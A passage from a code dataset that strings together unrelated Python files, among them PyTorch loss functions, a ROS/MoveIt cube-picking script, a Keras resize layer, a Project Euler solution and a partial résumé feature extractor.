y_pred.T\n for i in range(len(y_true)):\n sort_idx = torch.argsort(y_pred[i], descending=True)\n y_true_sorted = y_true[i][sort_idx]\n cumsum = torch.cumsum(y_true_sorted, dim=0)\n precision = cumsum / torch.arange(1, 1 + y_true[i].shape[0]).to(device)\n # 代表点\n mask = (y_true_sorted==1)\n average_precisions.append(precision[mask].mean().item())\n return sum(average_precisions)/len(y_true), average_precisions\ndef kl_divergence(input, target, activation = None):\n entropy = -(target[target != 0] * target[target != 0].log()).sum()\n if activation == 'softmax':\n cross_entropy = -(target * F.log_softmax(input, dim=1)).sum()\n elif activation == 'sigmoid':\n cross_entropy = -(target * F.logsigmoid(input)).sum()\n else:\n cross_entropy = -(target * input).sum()\n return (cross_entropy - entropy) / input.size(0)\ndef imscatter(x, y, image_list, ax=None, zoom=0.2, color='black'):\n for i in range(len(image_list)):\n if ax is None:\n ax = plt.gca()\n\n image = image_list[i] # plt.imread(image_list[i])\n im = OffsetImage(image, zoom=zoom)\n artists = []\n x0 = x[i]\n y0 = y[i]\n ab = AnnotationBbox(im, (x0, y0), xycoords='data', frameon=False, bboxprops=dict(color=color))\n artists.append(ax.add_artist(ab))\n return artists\ndef Multilabel_OneHot(labels, n_categories, dtype=torch.float32, normalize = True):\n batch_size = len(labels)\n one_hot_labels = torch.zeros(size=(batch_size, n_categories), dtype=dtype)\n for i, label in enumerate(labels):\n # Subtract 1 from each LongTensor because your\n # indexing starts at 1 and tensor indexing starts at 0\n label = torch.LongTensor(label)-1\n one_hot_labels[i] = one_hot_labels[i].scatter_(dim=0, index=label, value=1.)\n \n if normalize:\n return torch.mul(one_hot_labels, 1/one_hot_labels.sum(axis = 1).view(-1, 1))\n else:\n return one_hot_labels\ndef extract(G_model, target, inputs):\n feature = None\n\n def forward_hook(module, inputs, outputs):\n # 順伝搬の出力を features というグローバル変数に記録する\n global features\n features = outputs.detach()\n\n # コールバック関数を登録する。\n handle = target.register_forward_hook(forward_hook)\n\n # 推論する\n G_model.eval()\n G_model(inputs)\n\n # コールバック関数を解除する。\n handle.remove()\n\n return features\nclass CXLoss(nn.Module):\n def __init__(self, sigma=0.1, b=1.0, similarity=\"consine\"):\n super(CXLoss, self).__init__()\n self.similarity = similarity\n self.sigma = sigma\n self.b = b\n\n def center_by_T(self, featureI, featureT):\n # Calculate mean channel vector for feature map.\n meanT = featureT.mean(0, keepdim=True).mean(2, keepdim=True).mean(3, keepdim=True)\n return featureI - meanT, featureT - meanT\n\n def l2_normalize_channelwise(self, features):\n # Normalize on channel dimension (axis=1)\n norms = features.norm(p=2, dim=1, keepdim=True)\n features = features.div(norms)\n return features\n\n def patch_decomposition(self, features):\n N, C, H, W = features.shape\n assert N == 1\n P = H * W\n # NCHW --> 1x1xCXHW --> HWxCx1x1\n patches = features.view(1, 1, C, P).permute((3, 2, 0, 1))\n return patches\n\n def calc_relative_distances(self, raw_dist, axis=1):\n epsilon = 1e-5\n # [0] means get the value, torch min will return the index as well\n div = torch.min(raw_dist, dim=axis, keepdim=True)[0]\n relative_dist = raw_dist / (div + epsilon)\n return relative_dist\n\n def calc_CX(self, dist, axis=1):\n W = torch.exp((self.b - dist) / self.sigma)\n W_sum = W.sum(dim=axis, keepdim=True)\n return W.div(W_sum)\n\n def forward(self, featureT, featureI):\n '''\n :param featureT: target\n :param featureI: inference\n :return:\n '''\n\n # print(\"featureT target size:\", featureT.shape)\n # print(\"featureI inference size:\", featureI.shape)\n\n featureI, featureT = self.center_by_T(featureI, featureT)\n\n featureI = self.l2_normalize_channelwise(featureI)\n featureT = self.l2_normalize_channelwise(featureT)\n\n dist = []\n N = featureT.size()[0]\n for i in range(N):\n # NCHW\n featureT_i = featureT[i, :, :, :].unsqueeze(0)\n # NCHW\n featureI_i = featureI[i, :, :, :].unsqueeze(0)\n featureT_patch = self.patch_decomposition(featureT_i)\n # Calculate cosine similarity\n dist_i = F.conv2d(featureI_i, featureT_patch)\n dist.append(dist_i)\n\n # NCHW\n dist = torch.cat(dist, dim=0)\n\n raw_dist = (1. - dist) / 2.\n\n relative_dist = self.calc_relative_distances(raw_dist)\n\n CX = self.calc_CX(relative_dist)\n\n CX = CX.max(dim=3)[0].max(dim=2)[0]\n CX = CX.mean(1)\n CX = -torch.log(CX)\n CX = torch.mean(CX)\n return CX\ndef tile(a, dim, n_tile):\n init_dim = a.size(dim)\n repeat_idx = [1] * a.dim()\n repeat_idx[dim] = n_tile\n a = a.repeat(*(repeat_idx))\n order_index = torch.LongTensor(np.concatenate([init_dim * np.arange(n_tile) + i for i in range(init_dim)]))\n return torch.index_select(a, dim, order_index)\ndef split_list(l, n):\n \"\"\"\n リストをサブリストに分割する\n :param l: リスト\n :param n: サブリストの要素数\n :return: \n \"\"\"\n for idx in range(0, len(l), n):\n yield l[idx:idx + n]\n\ndef visualizer(path, G_model, z, char_num, label, device):\n G_model.eval()\n z_shape = z.shape\n label_shape = label.shape\n char = torch.eye(char_num).repeat(z_shape[0] * label_shape[0], 1).to(device)\n z = tile(z, 0, char_num).repeat(label_shape[0], 1).to(device)\n label = tile(label, 0, char_num * z_shape[0]).to(device)\n with torch.no_grad():\n samples = G_model(z, char, label)[0].data.cpu()\n samples = F.interpolate(samples, (64, 64), mode='nearest')\n samples = samples/2 + 0.5\n save_image(samples, path, nrow=char_num)\n\nclass FocalLoss(nn.Module):\n def __init__(self, gamma=2):\n super(FocalLoss, self).__init__()\n self.gamma = gamma\n\n def forward(self, input, target):\n target = target.float()\n # BCELossWithLogits\n max_val = (-input).clamp(min=0)\n loss = input - input * target + max_val + \\\n ((-max_val).exp() + (-input - max_val).exp()).log()\n\n invprobs = F.logsigmoid(-input * (target * 2.0 - 1.0))\n loss = (invprobs * self.gamma).exp() * loss\n if len(loss.size()) == 2:\n loss = loss.sum(dim=1)\n return loss.mean()\n\nclass KlLoss(nn.Module):\n def __init__(self, activation = None):\n super(KlLoss, self).__init__()\n self.activation = activation\n def forward(self, input, target):\n entropy = -(target[target != 0] * target[target != 0].log()).sum()\n if self.activation == 'softmax':\n cross_entropy = -(target * F.log_softmax(input, dim=1)).sum()\n elif self.activation == 'sigmoid':\n cross_entropy = -(target * F.logsigmoid(input)).sum()\n else:\n cross_entropy = -(target * input).sum()\n return (cross_entropy - entropy) / (input.size(0))\n\nclass CALoss(nn.Module):\n def __init__(self):\n super(CALoss, self).__init__()\n def forward(self, mu, logvar):\n # -0.5 * sum(1 + log(sigma^2) - mu^2 - sigma^2)\n KLD_element = mu.pow(2).add_(logvar.exp()).mul_(-1).add_(1).add_(logvar)\n KLD = torch.mean(KLD_element).mul_(-0.5)\n return KLD\n\nif __name__ == '__main__':\n loss = FocalLoss()\n input = torch.tensor([0.2,0.5, 0.7, 0.21, 0.4]).view(1, -1)\n target= torch.tensor([0, 1, 0, 1, 0]).view(1, -1)\n loss(input, target)","sub_path":"mylib.py","file_name":"mylib.py","file_ext":"py","file_size_in_byte":13747,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"349991072","text":"import os\nparams = {\n \"model_type\": \"dsc\",\n \"model_name\": \"test\",\n \"version\": \"0.0\",\n \"num_images\": 100,\n \"vectorize_images\": True,\n \"norm_images\": False,\n \"whiten_images\": False,\n \"contrast_normalize\": False,\n \"extract_patches\": True,\n \"num_patches\": 1e3,\n \"patch_edge_size\": 16,\n \"overlapping_patches\": True,\n \"randomize_patches\": True,\n \"patch_variance_threshold\": 1e-6,\n \"batch_size\": 100,\n \"norm_weights\": False,\n \"optimizer\": \"annealed_sgd\",\n \"rectify_u\": False,\n \"rectify_v\": False,\n \"num_u\": 576,\n \"num_v\": 20,\n \"num_steps\": 20,\n \"cp_int\": 2000,\n \"max_cp_to_keep\": 2,\n #\"w_init_loc\": os.path.expanduser(\"~\")+\"/Work/Projects/pretrain/analysis/0.0/weights/phi.npz\",\n \"w_init_loc\": None,\n \"cp_load\": False,\n \"cp_load_name\": \"pretrain\",\n \"cp_load_step\": 120000,\n \"cp_load_ver\": \"0.0\",\n \"cp_load_var\": [\"phi\"],\n \"cp_set_var\": [\"a\"],\n \"log_int\": 1,\n \"log_to_file\": False,\n \"gen_plot_int\": 2,\n \"save_plots\": True,\n \"eps\": 1e-12,\n \"device\": \"/cpu:0\",\n \"rand_seed\": 1234567890,\n \"out_dir\": os.path.expanduser(\"~\")+\"/Work/Projects/\",\n \"data_dir\": os.path.expanduser(\"~\")+\"/Work/Datasets/\"}\n\nschedule = [\n #{\"weights\": [\"a\"],\n #\"recon_mult\": 0.1,\n #\"sparse_mult\": 0.0,\n #\"a_decay_mult\": 1.0,\n #\"b_decay_mult\": 0.0,\n #\"u_step_size\": 0.01,\n #\"v_step_size\": 0.0,\n #\"weight_lr\": [0.1],\n #\"decay_steps\": [2000],\n #\"decay_rate\": [0.9],\n #\"staircase\": [True],\n #\"num_batches\": 2000}]#,\n\n {\"weights\": [\"a\", \"b\"],\n \"recon_mult\": 1.0,\n \"sparse_mult\": 0.1,\n \"a_decay_mult\": 0.8,\n \"b_decay_mult\": 0.8,\n \"u_step_size\": 0.01,\n \"v_step_size\": 0.001,\n \"weight_lr\": [0.1, 0.001],\n \"decay_steps\": [5000]*2,\n \"decay_rate\": [0.8]*2,\n \"staircase\": [True]*2,\n \"num_batches\": 5000}]\n","sub_path":"params/dsc_params.py","file_name":"dsc_params.py","file_ext":"py","file_size_in_byte":1722,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"92585165","text":"class Solution:\n def ladderLength(self, beginWord: str, endWord: str, wordList: List[str]) -> int:\n completed = 0\n start = beginWord\n length = len(beginWord)\n output = length*[0]\n for i in range(completed, len(wordList)):\n for j in range(length):\n if start.replace(start[j], '', 1) == wordList[i].replace(wordList[i][j], '', 1):\n start = wordList[i]\n output[completed] = wordList[i]\n wordList[i] = wordList[completed]\n wordList[completed] = output[completed]\n completed = completed + 1\n break\n for p in range(length):\n if start.replace(start[p], '', 1) == endWord.replace(endWord[p], '', 1):\n print(output)\n return completed + 2\n","sub_path":"LeetCode/WordLadder.py","file_name":"WordLadder.py","file_ext":"py","file_size_in_byte":872,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"429330185","text":"import json\n\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport matplotlib.colors as colors\nimport matplotlib.cm as cmx\nplt.style.use('ggplot')\n\nimport qsharp\n\nqsharp.packages.add(\"Microsoft.Quantum.MachineLearning::0.11.2004.2825\")\nqsharp.reload()\n\nfrom ml_module import (\n TrainHalfMoonModel, ValidateHalfMoonModel, ClassifyHalfMoonModel\n)\n\n\n\nif __name__ == \"__main__\":\n with open('data.json') as f:\n data = json.load(f)\n parameter_starting_points = [\n [0.060057, 3.00522, 2.03083, 0.63527, 1.03771, 1.27881, 4.10186, 5.34396],\n [0.586514, 3.371623, 0.860791, 2.92517, 1.14616, 2.99776, 2.26505, 5.62137],\n [1.69704, 1.13912, 2.3595, 4.037552, 1.63698, 1.27549, 0.328671, 0.302282],\n [5.21662, 6.04363, 0.224184, 1.53913, 1.64524, 4.79508, 1.49742, 1.545]\n ]\n\n (parameters, bias) = TrainHalfMoonModel.simulate(\n trainingVectors=data['TrainingData']['Features'],\n trainingLabels=data['TrainingData']['Labels'],\n initialParameters=parameter_starting_points\n )\n\n miss_rate = ValidateHalfMoonModel.simulate(\n validationVectors=data['ValidationData']['Features'],\n validationLabels=data['ValidationData']['Labels'],\n parameters=parameters, bias=bias\n )\n\n print(f\"Miss rate: {miss_rate:0.2%}\")\n\n # Classify the validation so that we can plot it.","sub_path":"HalfMoonModel/host.py","file_name":"host.py","file_ext":"py","file_size_in_byte":1370,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"303997021","text":"#!/usr/bin/env python\nimport copy\nimport math\nimport sys\nimport rospy\nimport tf\nimport random\nimport tf_conversions\nfrom gazebo_msgs.srv import DeleteModel, SpawnModel\nfrom sensor_msgs.msg import JointState\n\n# from geometry_msgs.msg import Point, Pose, Quaternion\nimport geometry_msgs\n\nimport moveit_commander\nimport moveit_msgs.msg\n\nfrom gazebo_msgs.srv import GetModelState\nfrom gazebo_msgs.srv import GetWorldProperties\n\n\ndef jointStatesCallback(msg):\n global currentJointState\n currentJointState = msg\n\n\ndef gripper_close():\n # Setup subscriber\n # rospy.Subscriber(\"/joint_states\", JointState, jointStatesCallback)\n\n pub = rospy.Publisher(\"/jaco/joint_control\", JointState, queue_size=1)\n\n currentJointState = rospy.wait_for_message(\"/joint_states\", JointState)\n rospy.loginfo(\"Received!\")\n currentJointState.header.stamp = rospy.get_rostime()\n tmp = 0.75\n # tmp_tuple=tuple([tmp] + list(currentJointState.position[1:]))\n currentJointState.position = tuple(\n list(currentJointState.position[:6]) + [tmp] + [tmp] + [tmp]\n )\n rate = rospy.Rate(10) # 10hz\n for i in range(3):\n pub.publish(currentJointState)\n rospy.loginfo(\"Published!\")\n rate.sleep()\n\n return 0\n\n\ndef gripper_open():\n # Setup subscriber\n # rospy.Subscriber(\"/joint_states\", JointState, jointStatesCallback)\n\n pub = rospy.Publisher(\"/jaco/joint_control\", JointState, queue_size=1)\n\n currentJointState = rospy.wait_for_message(\"/joint_states\", JointState)\n rospy.loginfo(\"Received!\")\n currentJointState.header.stamp = rospy.get_rostime()\n tmp = 0.005\n # tmp_tuple=tuple([tmp] + list(currentJointState.position[1:]))\n currentJointState.position = tuple(\n list(currentJointState.position[:6]) + [tmp] + [tmp] + [tmp]\n )\n rate = rospy.Rate(10) # 10hz\n for i in range(3):\n pub.publish(currentJointState)\n rospy.loginfo(\"Published!\")\n rate.sleep()\n\n return 0\n\n\ndef find_cube(models, model_coordinates, robot, scene):\n # find all models with cube in them\n model_names = [i for i in models().model_names if \"cube\" in i]\n\n # height = 1.4\n # remove all objects from scene (does not work)\n # scene.world.collision_objects.clear()\n cube_poses = []\n\n for model_name in model_names:\n # extract all positions\n p = geometry_msgs.msg.PoseStamped()\n p.header.frame_id = robot.get_planning_frame()\n p.pose = model_coordinates(model_name, \"\").pose\n p.pose.position.z += 0.17\n\n cube_poses.append(p)\n # scene.add_box(model_name, p, (0.05, 0.05, 0.05))\n # rospy.loginfo(model_name)\n # rospy.loginfo(p)\n rospy.loginfo(cube_poses)\n # to access a position do cube_poses[0].x\n return cube_poses\n\n\ndef find_bucket(models, model_coordinates, robot, scene):\n # Find the position of the bucket\n\n # Search of the object \"bucket\" in the model_states topic\n model_names = [i for i in models().model_names if \"bucket\" in i]\n p = geometry_msgs.msg.PoseStamped()\n p.header.frame_id = robot.get_planning_frame()\n p.pose = model_coordinates(model_names[0], \"\").pose\n p.pose.position.z += 0.09\n scene.add_box(model_names[0], p, (0.22, 0.22, 0.20))\n\n return p.pose\n\n\ndef add_table_scene(robot, scene):\n # Find the position of the bucket\n\n # Search of the object \"bucket\" in the model_states topic\n p = geometry_msgs.msg.PoseStamped()\n p.header.frame_id = robot.get_planning_frame()\n p.pose.position.x = 0\n p.pose.position.y = 0\n p.pose.position.z = 0.683\n scene.add_box(\"table\", p, (2, 2, 0.10))\n\n rospy.loginfo(p)\n\n return p.pose\n\n\n# def move_path(models, model_coordinates, p, scene, group, robot):\ndef move_path(\n group, goal_pose, display_trajectory_publisher, vert_approach=True, vert_offset=0.25\n):\n rospy.sleep(0.2)\n curr_pose = group.get_current_pose().pose\n rospy.loginfo(\"Initial pose...\\n{}\".format(curr_pose.position))\n\n waypoints = []\n waypoints.append(curr_pose)\n\n curr_pose.orientation = goal_pose.orientation\n waypoints.append(curr_pose)\n move_a2b(group, waypoints, display_trajectory_publisher)\n\n # movin to vert_offset m above\n waypoints = []\n curr_pose = group.get_current_pose().pose\n waypoints.append(curr_pose)\n inter_pose = copy.deepcopy(goal_pose)\n inter_pose.position.z += vert_offset\n waypoints.append(inter_pose)\n move_a2b(group, waypoints, display_trajectory_publisher)\n\n # dipping down for cubes\n if vert_approach:\n waypoints = []\n curr_pose = group.get_current_pose().pose\n waypoints.append(curr_pose)\n waypoints.append(goal_pose)\n move_a2b(group, waypoints, display_trajectory_publisher)\n\n gripper_close()\n rospy.sleep(0.5)\n\n # resetting above to avoid collisions\n waypoints = []\n curr_pose = group.get_current_pose().pose\n waypoints.append(curr_pose)\n waypoints.append(inter_pose)\n move_a2b(group, waypoints, display_trajectory_publisher)\n else:\n gripper_open()\n rospy.sleep(0.5)\n\n # printing final position\n rospy.loginfo(\n \"Final position...\\n{}\".format(group.get_current_pose().pose.position)\n )\n\n\ndef move_a2b(group, waypoints, display_trajectory_publisher):\n rospy.loginfo(\n \"Moving from...\\n{}\\nto...\\n{}\".format(\n waypoints[0].position, waypoints[-1].position\n )\n )\n (plan1, _) = group.compute_cartesian_path(waypoints, 0.01, 0.0)\n # rospy.sleep(2.0)\n # waiting for RViz to display path\n display_trajectory = moveit_msgs.msg.DisplayTrajectory()\n display_trajectory.trajectory_start = robot.get_current_state()\n display_trajectory.trajectory.append(plan1)\n display_trajectory_publisher.publish(display_trajectory)\n rospy.sleep(1.0)\n\n # Moving to a pose goal\n group.execute(plan1, wait=True)\n rospy.sleep(0.5)\n\n\nif __name__ == \"__main__\":\n rospy.init_node(\"move_cubes\")\n models = rospy.ServiceProxy(\"/gazebo/get_world_properties\", GetWorldProperties)\n model_coordinates = rospy.ServiceProxy(\"/gazebo/get_model_state\", GetModelState)\n\n # initializing moveit related things\n moveit_commander.roscpp_initialize(sys.argv)\n scene = moveit_commander.PlanningSceneInterface()\n robot = moveit_commander.RobotCommander()\n group = moveit_commander.MoveGroupCommander(\"Arm\")\n\n display_trajectory_publisher = rospy.Publisher(\n \"/move_group/display_planned_path\",\n moveit_msgs.msg.DisplayTrajectory,\n queue_size=1e3,\n )\n rospy.sleep(2)\n\n group.set_goal_orientation_tolerance(0.01)\n group.set_goal_tolerance(0.01)\n group.set_goal_joint_tolerance(0.01)\n group.set_planning_time(1e3)\n\n p = geometry_msgs.msg.PoseStamped()\n\n # add_table_scene(robot, scene)\n pose_cubes = find_cube(models, model_coordinates, robot, scene)\n pose_bucket = find_bucket(models, model_coordinates, robot, scene)\n\n # motion commands for a single cube-pickup and dropoff\n # should repeat for cube in pose_cubes\n pose_goal = group.get_current_pose().pose\n pose_goal.orientation = geometry_msgs.msg.Quaternion(\n *tf_conversions.transformations.quaternion_from_euler(\n 0.0, -math.pi / 2, -math.pi / 4\n )\n )\n\n gripper_open()\n for cube in pose_cubes:\n # goto cube\n rospy.loginfo(\"Going to cube...\")\n pose_goal.position = copy.deepcopy(cube.pose.position)\n move_path(\n group,\n pose_goal,\n display_trajectory_publisher,\n vert_approach=True,\n vert_offset=0.5,\n )\n # goto bucket\n rospy.loginfo(\"Going to bucket...\")\n pose_goal.position = copy.deepcopy(pose_bucket.position)\n move_path(\n group,\n pose_goal,\n display_trajectory_publisher,\n vert_approach=False,\n vert_offset=0.5,\n )\n\n","sub_path":"catkin_ws_project_1/src/proj1/scripts/move_cubes_to_bucket.py","file_name":"move_cubes_to_bucket.py","file_ext":"py","file_size_in_byte":7935,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"584099277","text":"#!/usr/bin/env python\n\nimport os\nimport datetime\n\nfrom flask import Blueprint, request, render_template\nfrom flask_application import app\n\nfrontend = Blueprint('frontend', __name__)\n\n\n@frontend.route('/')\ndef index():\n if app.debug:\n app.logger.debug('rendering index')\n\n # Get ember templates\n template_dir = 'flask_application/templates/ember'\n templates = [os.path.join('ember', t) for t in os.listdir(template_dir)]\n\n return render_template(\n 'index.html',\n config=app.config,\n templates=templates\n )\n\n","sub_path":"flask_application/controllers/frontend.py","file_name":"frontend.py","file_ext":"py","file_size_in_byte":584,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"285834167","text":"import math\n\ndef sumDivisors(x):\n\tdivs = []\n\t\n\tfor i in range(1, int(math.floor(x**.5))):\n\t\tif x % i == 0:\n\t\t\tdivs.append(i)\n\t\t\t\n\t\t\tif x / i != i and x != i:\n\t\t\t\tdivs.append(x/i)\n\t\n\tlambdaSum = lambda x,y: x+y\n\treturn reduce( lambdaSum, divs)\n\namicables = []\ndivSums = []\nfor i in range(4, 10000):\n\tdivSum = sumDivisors(i)\n\tif divSum in divSums:\n\t\tamicables.append(i)\n\t\tamicable = divSums.index(divSum)\n\t\tif not amicable in amicables:\n\t\t\tamicables.append(amicable)\n\n\tdivSums.append(divSum)\n\nlambdaSum = lambda x,y: x+y\nprint(amicables)\nprint(reduce( lambdaSum, amicables ) )\n","sub_path":"python/21eu.py","file_name":"21eu.py","file_ext":"py","file_size_in_byte":575,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"586071793","text":"import tensorflow as tf\nfrom keras import layers\nfrom keras.utils.generic_utils import register_keras_serializable\nfrom keras.utils.tf_utils import shape_type_conversion\n\n\n@register_keras_serializable(package='SegMe')\nclass ResizeByScale(layers.Layer):\n def __init__(self, scale, method=tf.image.ResizeMethod.BILINEAR, antialias=False, **kwargs):\n kwargs['autocast'] = False\n super().__init__(**kwargs)\n self.input_spec = layers.InputSpec(ndim=4)\n self.scale = float(scale)\n self.method = method\n self.antialias = antialias\n\n def _scale(self, value):\n return None if value is None else int(round(value * self.scale))\n\n def call(self, inputs, **kwargs):\n if 1 == self.scale:\n return inputs\n\n new_size = tf.cast(tf.round(tf.cast(tf.shape(inputs)[1:3], self.compute_dtype) * self.scale), 'int32')\n resized = tf.image.resize(inputs, new_size, method=self.method, antialias=self.antialias)\n\n inputs_dtype = tf.dtypes.as_dtype(inputs.dtype)\n if inputs_dtype.is_integer:\n resized = tf.round(resized)\n resized = tf.cast(resized, inputs.dtype)\n\n new_shape = inputs.shape[0], self._scale(inputs.shape[1]), self._scale(inputs.shape[2]), inputs.shape[3]\n resized.set_shape(new_shape)\n\n return resized\n\n @shape_type_conversion\n def compute_output_shape(self, input_shape):\n if 1 == self.scale:\n return input_shape\n\n return input_shape[0], self._scale(input_shape[1]), self._scale(input_shape[2]), input_shape[3]\n\n def compute_output_signature(self, input_signature):\n output_signature = super().compute_output_signature(input_signature)\n\n return tf.TensorSpec(dtype=input_signature.dtype, shape=output_signature.shape)\n\n def get_config(self):\n config = super().get_config()\n config.update({\n 'scale': self.scale,\n 'method': self.method,\n 'antialias': self.antialias\n })\n\n return config\n\n\ndef resize_by_scale(inputs, **kwargs):\n return ResizeByScale(**kwargs)(inputs)\n","sub_path":"segme/common/resizebyscale.py","file_name":"resizebyscale.py","file_ext":"py","file_size_in_byte":2112,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"188280665","text":"import os\nimport pickle\nimport numpy as np\nimport sys\nimport math\nfrom torch.autograd import Variable\nimport torch\n\n\ndef file_cache_name(file):\n head, tail = os.path.split(file)\n filename, ext = os.path.splitext(tail)\n return os.path.join(head, filename + \".p\")\n\n\ndef write_cache_word_vectors(file, data):\n with open(file_cache_name(file), 'wb') as pickle_file:\n pickle.dump(data, pickle_file)\n\n\ndef load_cache_word_vectors(file):\n with open(file_cache_name(file), 'rb') as f:\n return pickle.load(f)\n\ndef label_mapping(y):\n y_np = np.array(y)\n un_labels = np.unique(y_np)\n lab2idx = {}\n idx2lab = {}\n for idx, lab in enumerate(un_labels):\n lab2idx[lab] = idx\n idx2lab[idx] = lab\n return lab2idx, idx2lab\n\n\ndef progress(loss, epoch, batch, batch_size, dataset_size):\n batches = math.ceil(float(dataset_size) / batch_size)\n count = batch * batch_size\n bar_len = 40\n filled_len = int(round(bar_len * count / float(dataset_size)))\n\n bar = '=' * filled_len + '-' * (bar_len - filled_len)\n\n status = 'Epoch {}, Loss: {:.4f}'.format(epoch, loss)\n _progress_str = \"\\r \\r [{}] ...{}\".format(bar, status)\n sys.stdout.write(_progress_str)\n sys.stdout.flush()\n\n if batch == batches:\n print()\n\n\ndef train_epoch(epoch, data_loader, model, loss_function, optimizer,\n batch_size, train_set):\n\n model.train()\n\n ## training epoch\n total_loss = 0.0\n print('epoch', epoch)\n for iteration, batch in enumerate(data_loader, 1):\n samples, labels, lengths = batch\n samples = Variable(samples)\n labels = Variable(labels)\n lengths = Variable(lengths)\n\n # if torch.cuda.is_available():\n # samples = samples.cuda(1)\n # labels = labels.cuda(1)\n # lengths = lengths.cuda(1)\n\n # 1 - zero the gradients\n optimizer.zero_grad()\n\n # 2 - forward pass\n output = model(samples, lengths)\n\n # 3 - compute loss\n _loss = loss_function(output, labels)\n\n # 4 - backward pass\n _loss.backward()\n\n # 5 - optimizer step\n optimizer.step()\n\n total_loss += _loss.data[0]\n\n # print statistics\n progress(loss=_loss.data[0],\n epoch=epoch,\n batch=iteration,\n batch_size=batch_size,\n dataset_size=len(train_set))\n\n _avg_loss = total_loss / iteration\n\n return _avg_loss\n\n\ndef test_epoch(epoch, data_loader, model, loss_function):\n\n model.eval()\n y_pred = []\n y = []\n\n total_loss = 0\n print('epoch', epoch)\n for iteration, batch in enumerate(data_loader, 1):\n samples, labels, lengths = batch\n samples = Variable(samples, volatile=True)\n labels = Variable(labels, volatile=True)\n lengths = Variable(lengths, volatile=True)\n\n if torch.cuda.is_available():\n samples = samples.cuda(1)\n labels = labels.cuda(1)\n lengths = lengths.cuda(1)\n\n # 1 - zero the gradients\n # optimizer.zero_grad()\n\n # 2 - forward pass\n output = model(samples, lengths)\n\n # 3 - compute loss\n _loss = loss_function(output, labels)\n\n # 4 - backward pass\n # loss.backward()\n\n # 5 - optimizer step\n # optimizer.step()\n\n total_loss += _loss.data[0]\n\n _, predicted = torch.max(output.data, 1)\n y.extend(list(labels.data.cpu().numpy().squeeze()))\n y_pred.extend(list(predicted.squeeze()))\n\n _avg_loss = total_loss / iteration\n\n return _avg_loss, y, y_pred\n","sub_path":"utils/utilities.py","file_name":"utilities.py","file_ext":"py","file_size_in_byte":3608,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"617976776","text":"import torch\nimport torch.nn as nn\n\nfrom maskrcnn_benchmark.config import cfg\nfrom predictor import COCODemo\n\nclass FasterRcnnVisionModel (nn.Module):\n\n def __init__ (self):\n super(FasterRcnnVisionModel, self).__init__()\n\n config_file = '/home/jl25/research/maskrcnn-benchmark/configs/caffe2/e2e_faster_rcnn_R_101_FPN_1x_caffe2.yaml'\n cfg.merge_from_file(config_file)\n self.coco_demo = COCODemo(cfg)\n\n def forward (self, image):\n '''\n > image cv2image\n < bboxes [[float * 4] * n_regions=1000]\n < regions_visual_feats [(d_region_visual_feats=1024) * n_regions=1000]\n < objectnesses [float * n_regions=1000]\n < image_feats (1, d_image_feats)\n '''\n\n bbox_feats, bboxes_reg, objectness = self.coco_demo.compute_prediction(image)\n bboxes = bboxes_reg.bbox.tolist()[:-1]\n bboxes_feats = list(bbox_feats.cpu().chunk(bbox_feats.size(0), dim=0))\n regions_visual_feats = bboxes_feats[:-1]\n image_feats = bbox_feats[-1,:].unsqueeze(0).cpu().clone().detach()\n objectnesses = objectness.tolist()\n return bboxes, regions_visual_feats, objectnesses, image_feats\n","sub_path":"demo/FasterRcnnVisionModel.py","file_name":"FasterRcnnVisionModel.py","file_ext":"py","file_size_in_byte":1179,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"373896619","text":"#We used the following libraries:\n\n#numpy: This library used for dealing with numeric values and all the functions which using these values.\n#collections: This library used for getting the default dictionary.\n\n#We also used the \"ResumeHelper\" and \"ResumeSegmenter\" classes that we have created.\n\nimport numpy as np\nfrom collections import defaultdict\n\nimport ResumeHelper\nimport ResumeSegmenter\n\n#This function takes 4 parameters.\n#First parameter is which contains a group of sentences with their font size and type.\n#Second parameter is paragraph number.\n#Third parameter is the previous sentences feature extraction of this sentence which contains a list of features dictionaries.\n#Fourth parameter is the previous sentences segmentation values.\n#Returns a dictionary of features, where the key represents the feature name.\ndef sentenceFeaturesExtraction(sentences_info, paragraph_num, prev_x_result, prev_y_result):\n Contain_email = False\n Contain_Phone = False\n Contain_URL = False\n Contain_Date = False\n IsExperienceSegment = False\n IsSkillSegment = False\n IsEducationSegment = False\n IsProjectSegment = False\n Font_Size = defaultdict(int)\n Font_Family = defaultdict(int)\n Word_Count = 0\n\n if paragraph_num == 0:\n prevtag = \"\"\n pre_Font_Size = 0\n pre_Font_Family = \"\"\n else:\n prevtag = prev_y_result[-1]\n pre_Font_Size = prev_x_result[-1][\"Font_Size\"]\n pre_Font_Family = prev_x_result[-1][\"Font_Family\"]\n\n for sent_info in sentences_info:\n for sub_sent in sent_info[0]:\n if ResumeHelper.getUrl(sub_sent) != None:\n Contain_URL = True\n\n if ResumeHelper.getEmail(sub_sent) != None:\n Contain_email = True\n\n if ResumeHelper.getDate(sub_sent.lower()) != None:\n Contain_Date = True\n\n if ResumeHelper.getNumber(sub_sent) != None:\n Contain_Phone = True\n\n for word in ResumeSegmenter.work_experience_segment:\n if sub_sent.lower().__contains__(word.lower()):\n IsExperienceSegment = True\n\n for word in ResumeSegmenter.skill_segment:\n if sub_sent.lower().__contains__(word.lower()):\n IsSkillSegment = True\n\n for word in ResumeSegmenter.education_segment:\n if sub_sent.lower().__contains__(word.lower()):\n IsEducationSegment = True\n\n for word in ResumeSegmenter.project_segment:\n if sub_sent.lower().__contains__(word.lower()):\n IsProjectSegment = True\n\n Word_Count += len(sub_sent.split(' '))\n for word in sub_sent.split():\n Font_Size[sent_info[1]] += 1\n Font_Family[sent_info[2]] += 1\n\n most_iterate_size_value = 0\n most_iterate_size = 0\n\n for size in 